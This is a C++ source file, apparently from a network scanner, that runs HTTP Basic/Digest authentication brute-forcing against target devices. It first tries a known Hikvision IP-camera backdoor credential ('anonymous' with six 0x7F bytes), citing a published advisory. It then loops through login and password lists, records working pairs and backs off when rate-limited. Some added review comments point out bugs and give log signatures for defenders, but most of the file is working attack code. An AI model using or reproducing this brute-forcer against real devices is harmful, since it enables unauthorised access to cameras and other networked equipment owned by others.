#include "BasicAuth.h"
/**
 * Classify a captured HTTP response by looking for fixed text markers.
 *
 * Every lookup goes through Utils::ustrstr (declared elsewhere); this code
 * treats a result of -1 as "marker absent".
 *
 * @param buffer  response text to inspect
 * @param ip      not read by this function
 * @param port    not read by this function
 * @return  1 when a "200" marker is present and none of the "unauthorized"
 *            markers is;
 *         -2 when a 404 status line is present;
 *         -1 when a 503 / 400 / 403 marker is present (returned only after
 *            Sleep(30000));
 *          0 otherwise.
 */
int BA::checkOutput(const string *buffer, const char *ip, const int port) {
    const auto seen = [buffer](const char *marker) {
        return Utils::ustrstr(*buffer, marker) != -1;
    };

    const bool statusOk = seen("200 ok")
        || seen("http/1.0 200")
        || seen("http/1.1 200");

    if (statusOk) {
        // Some devices answer 200 and report the failed login in the body,
        // so body-level markers are checked as well as the status line.
        const bool denied = seen("http/1.1 401 ")
            || seen("http/1.0 401 ")
            || seen("<statusValue>401</statusValue>")
            || seen("<statusString>Unauthorized</statusString>")
            // NOTE(review): this literal looks like a mis-encoded copy of the
            // Cyrillic marker on the next line — confirm against the repository.
            || seen("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>")
            || seen("Неправильны")
            // The original annotates this marker with the host it was observed on.
            || seen("code: \"401\"");
        if (!denied) {
            return 1;
        }
    }

    if (seen("http/1.1 404") || seen("http/1.0 404")) {
        return -2;
    }

    const bool refused = seen("503 service unavailable")
        || seen("http/1.1 503")
        || seen("http/1.0 503")
        || seen("400 BAD_REQUEST")
        || seen("400 bad request")
        || seen("403 Forbidden");
    if (refused) {
        // The calling thread is paused before the caller learns the result.
        Sleep(30000);
        return -1;
    }

    return 0;
}
//http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities 2
/**
 * Send one request with the fixed credential pair "anonymous" / six 0x7F
 * bytes (octal \177) and report whether BA::checkOutput classifies the
 * response as a success (1).
 *
 * For defenders: the request built here carries exactly that user name and
 * password, so a login attempt with this pair is a recognisable signature of
 * this check in device or proxy logs. The advisory linked in the comment
 * above this function is the author's reference for it.
 *
 * @param ip          target address handed to Connector::nConnect
 * @param port        target port
 * @param digestMode  forwarded unchanged to Connector::nConnect
 * @return true only when nConnect returned a positive value and the response
 *         was classified as 1 by BA::checkOutput
 */
inline bool commenceHikvisionEx1(const char *ip, const int port, bool digestMode) {
    std::string credentials("anonymous");
    credentials += ":";
    credentials += "\177\177\177\177\177\177";

    std::string response;
    Connector probe;
    const int received = probe.nConnect(ip, port, &response, NULL, NULL, &credentials, digestMode);

    if (received <= 0) {
        return false;
    }
    return BA::checkOutput(&response, ip, port) == 1;
}
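/**
 * Return the value of the first "location: " header found in a raw HTTP
 * response, matched case-insensitively.
 *
 * The value is server-controlled and of arbitrary length; callers that copy
 * it into fixed-size buffers must bound the copy themselves.
 *
 * NOTE(review): the search is a plain substring match, so a header whose name
 * merely ends in "location: " (for example "Content-Location: ") is matched
 * too if it appears first.
 *
 * @param buff  response text; a null pointer is treated as "no header"
 * @return the text between "location: " and the next CRLF (or the end of the
 *         buffer when no CRLF follows), or an empty string when absent
 */
std::string getLocation(const std::string *buff) {
    if (buff == nullptr) {
        return "";
    }

    // Lower-case a copy for the search; the copy has the same length as the
    // original, so offsets found in it are valid in *buff.
    std::string buffLower = *buff;
    std::transform(buffLower.begin(), buffLower.end(), buffLower.begin(),
        // tolower() is undefined for negative char values, which any byte
        // >= 0x80 becomes where char is signed; go through unsigned char.
        [](unsigned char c) { return static_cast<char>(::tolower(c)); });

    // Keep the position as size_type instead of narrowing npos into an int.
    const std::string::size_type headerPos = buffLower.find("location: ");
    if (headerPos == std::string::npos) {
        return "";
    }

    const std::string::size_type valuePos = headerPos + 10; // strlen("location: ")
    const std::string::size_type lineEnd = buff->find("\r\n", headerPos);
    if (lineEnd == std::string::npos) {
        return buff->substr(valuePos);
    }
    return buff->substr(valuePos, lineEnd - valuePos);
}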
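/**
 * Fill `ip` with the address to use for follow-up requests: the original
 * address, or one derived from the response's Location header.
 *
 * The Location value comes from the remote server and is untrusted, so every
 * write into `ip` is bounded by `size` and the result is always
 * NUL-terminated. The previous implementation cast the pointer returned by
 * strstr() to int and used it as a copy length, and relied on strncpy() /
 * strncat() with `size` as the bound, which could write far past the buffer.
 *
 * @param ipOrig  original target string (NUL-terminated)
 * @param ip      output buffer of `size` bytes
 * @param buff    raw response that may contain a Location header
 * @param size    capacity of `ip` in bytes, including the terminator
 */
void setNewIP(const char *ipOrig, char *ip, std::string *buff, int size) {
    if (ip == nullptr || size <= 0) {
        return;
    }
    ip[0] = '\0';
    if (ipOrig == nullptr) {
        return;
    }

    // Bytes available for text once the terminator is reserved.
    const size_t room = static_cast<size_t>(size) - 1;

    // Default result: the original address, truncated if it does not fit.
    strncpy(ip, ipOrig, room);
    ip[room] = '\0';

    if (buff == nullptr) {
        return;
    }
    const std::string location = getLocation(buff);
    if (location.empty()) {
        return;
    }

    // A value containing "http" is taken as a complete URL and replaces the
    // address outright.
    if (Utils::ustrstr(location, "http") != -1) {
        strncpy(ip, location.c_str(), room);
        ip[room] = '\0';
        return;
    }

    // Otherwise the value is appended to the original address, cut at the
    // first '/' found from offset 8 onwards (the offset presumably skips a
    // scheme prefix such as "https://" — confirm with the callers). Short
    // inputs are not searched, so the scan never starts past the terminator.
    const size_t origLen = strlen(ipOrig);
    size_t baseLen = origLen;
    if (origLen > 8) {
        const char *slash = strchr(ipOrig + 8, '/');
        if (slash != nullptr) {
            baseLen = static_cast<size_t>(slash - ipOrig);
        }
    }
    if (baseLen > room) {
        baseLen = room;
    }

    // `ip` already holds the leading bytes of ipOrig; cut it at the base and
    // append only as much of the location as still fits.
    ip[baseLen] = '\0';
    strncat(ip, location.c_str(), room - baseLen);
}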
/**
 * Run the HTTP authentication check against one target and return the
 * outcome as a lopaStr.
 *
 * Sequence, as written below:
 *   1. One unauthenticated request to ipOrig; responses containing
 *      "404 not found" or "404 site" end the run immediately.
 *   2. The working address `ip` is derived from the response by setNewIP().
 *   3. Utils::isDigest() on the response selects digestMode, or ends the run.
 *   4. commenceHikvisionEx1() is tried once with its fixed credential pair.
 *   5. Every loginLst[i] / passLst[j] pair is sent in turn, with Sleep(50)
 *      after each attempt that did not end the run.
 *
 * For defenders: on the server side steps 4-5 appear as a run of
 * authenticated requests from one client, one credential pair per request.
 * checkOutput() (in this file) pauses the thread with Sleep(30000) when the
 * response carries a 503 / 400 / 403 marker.
 *
 * @param ipOrig              target as supplied by the caller
 * @param port                target port
 * @param performDoubleCheck  when true, an empty first response or an
 *                            isDigest() result of -1 is retried up to twice
 * @return lopaStr initialised to {"UNKNOWN", "", ""}; login/pass are filled
 *         in on a match and `other` is set to "404" when checkOutput()
 *         reports -2
 */
lopaStr BA::BABrute(const char *ipOrig, const int port, bool performDoubleCheck) {
    bool digestMode = true;
    string lpString;
    lopaStr lps = {"UNKNOWN", "", ""};
    int passCounter = 0;
    int res = 0;
    int rowIndex = -1;

    std::string buff;
    Connector con;

    // Initial unauthenticated request; sz is compared with 0 below as the
    // "empty response" case.
    int sz = con.nConnect(ipOrig, port, &buff);

    if (Utils::ustrstr(&buff, "404 not found") != -1 || Utils::ustrstr(&buff, "404 site") != -1) {
        return lps;
    }

    char ip[256] = { 0 };

    if (sz == 0) {
        if (performDoubleCheck) {
            // Retry up to two more times, waiting gTimeOut before each.
            // NOTE(review): `ip` is still zero-filled at this point, so these
            // retries and the "Empty BA probe" links below are built from an
            // empty string, while the first request used ipOrig.
            Sleep(gTimeOut);
            sz = con.nConnect(ip, port, &buff);
            if (sz == 0) {
                Sleep(gTimeOut);
                sz = con.nConnect(ip, port, &buff);
                if (sz == 0) {
                    QString ipString = QString(ip);
                    stt->doEmitionFoundData("<span style=\"color:orange;\">Empty BA probe - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
                    return lps;
                }
                else {
                    setNewIP(ipOrig, ip, &buff, 256);
                }
            }
            else {
                setNewIP(ipOrig, ip, &buff, 256);
            }
        }
        else {
            QString ipString = QString(ip);
            stt->doEmitionFoundData("<span style=\"color:orange;\">Empty BA probe - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
            return lps;
        }
    }
    else {
        // From here on `ip` may hold text taken from the server's Location
        // header (see setNewIP), i.e. untrusted data.
        setNewIP(ipOrig, ip, &buff, 256);
    }

    // isDigest() results handled here: -2 -> reported as 404, -1 -> no 401
    // challenge seen, 1 -> digest mode, anything else -> digestMode = false.
    int isDig = Utils::isDigest(&buff);
    if (-2 == isDig) {
        // NOTE(review): `ip` is concatenated into markup without escaping in
        // every doEmitionFoundData call in this function. If that sink renders
        // rich text, a hostile server could inject markup into the operator's
        // UI through its Location header — confirm how the slot displays it.
        QString ipString = QString(ip);
        stt->doEmitionFoundData("<span style=\"color:orange;\">404 not found - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
        return lps;
    }
    if (isDig == -1) {
        if (performDoubleCheck) {
            Sleep(gTimeOut);
            // This `sz` shadows the outer one and is not read afterwards.
            int sz = con.nConnect(ip, port, &buff);
            isDig = Utils::isDigest(&buff);
            if (isDig == -1) {
                Sleep(gTimeOut);
                int sz = con.nConnect(ip, port, &buff);
                isDig = Utils::isDigest(&buff);
                if (isDig == -1) {
                    QString ipString = QString(ip);
                    stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 found - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
                    return lps;
                }
            }
            // When a retry yields something other than -1, digestMode keeps
            // its initial value (true): the else-if chain below belongs to
            // the outer `if (isDig == -1)` and is skipped on this path.
        }
        else {
            QString ipString = QString(ip);
            stt->doEmitionFoundData("<span style=\"color:orange;\">No 401 found - <a style=\"color:orange;\" href=\"" + ipString + "/\">" + ipString + "</a></span>");
            return lps;
        }
    }
    else if (isDig == 1) digestMode = true;
    else digestMode = false;

    std::string buffer;

    // Fixed-credential check first; on success that pair is reported.
    if (commenceHikvisionEx1(ip, port, digestMode)) {
        strcpy(lps.login, "anonymous");
        strcpy(lps.pass, "\177\177\177\177\177\177");
        return lps;
    }

    // NOTE(review): the strcpy() calls into these 32-byte buffers are
    // unbounded; a loginLst / passLst entry of 32 bytes or more would overrun
    // the stack buffer. Both lists are declared outside this file section.
    char login[32] = { 0 };
    char pass[32] = { 0 };
    for(int i = 0; i < MaxLogin; ++i) {
        // Waits on FileUpdater::cv until FileUpdater::ready is true
        // (presumably set by the file updater — confirm).
        FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; });
        strcpy(login, loginLst[i]);
        for (int j = 0; j < MaxPass; ++j) {
            FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;});
            // Global stop switch: abandon the run with whatever lps holds.
            if (!globalScanFlag) return lps;

            strcpy(pass, passLst[j]);

            lpString = string(login) + ":" + string(pass);

            // A fresh Connector per attempt; shadows the outer `con`.
            Connector con;
            res = con.nConnect(ip, port, &buffer, NULL, NULL, &lpString, digestMode);
            if (res == -2) {
                rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "TIMEOUT", rowIndex);

                return lps;
            }
            else if (res != -1) {
                res = checkOutput(&buffer, ip, port);
                if (res == -2) {

                    rowIndex = Utils::addBARow(QString(ip), "--", "404", rowIndex);
                    strcpy(lps.other, "404");
                    return lps;
                }
                if (res == -1) {
                    // Leave the password loop. Together with the outer
                    // loop's own ++i, this advances the login index by two.
                    ++i;
                    break;
                }
                if (res == 1) {
                    rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex);

                    strcpy(lps.login, login);
                    strcpy(lps.pass, pass);
                    return lps;
                };
            }

            // Progress row: attempts so far as a percentage of
            // MaxPass * MaxLogin, cut to the first four characters.
            rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex);
            ++passCounter;
            Sleep(50);
        }
    }

    // Reached when the loops finish without any of the early returns above.
    rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex);
    return lps;
}
/**
 * Gate in front of BABrute(): waits for a free worker slot, keeps the
 * counters up to date and forwards the call.
 *
 * When gMaxBrutingThreads is not positive nothing is attempted and the
 * default {"UNKNOWN", "", ""} record is returned.
 *
 * NOTE(review): the wait on BrutingThrds and the increment that follows are
 * separate steps. Whether that is safe with several callers depends on how
 * BrutingThrds and baCount are declared, which is not visible here.
 *
 * @param ip                  target passed through to BABrute
 * @param port                target port
 * @param performDoubleCheck  passed through to BABrute
 * @return the lopaStr produced by BABrute, or the default record
 */
lopaStr BA::BALobby(const char *ip, const int port, bool performDoubleCheck) {
    if (!(gMaxBrutingThreads > 0)) {
        lopaStr unknown = {"UNKNOWN", "", ""};
        return unknown;
    }

    // Poll once a second until the number of running workers drops below the cap.
    while (BrutingThrds >= gMaxBrutingThreads) {
        Sleep(1000);
    }

    ++baCount;
    ++BrutingThrds;
    stt->doEmitionUpdateArc(gTargets);

    lopaStr outcome = BABrute(ip, port, performDoubleCheck);

    --BrutingThrds;
    return outcome;
}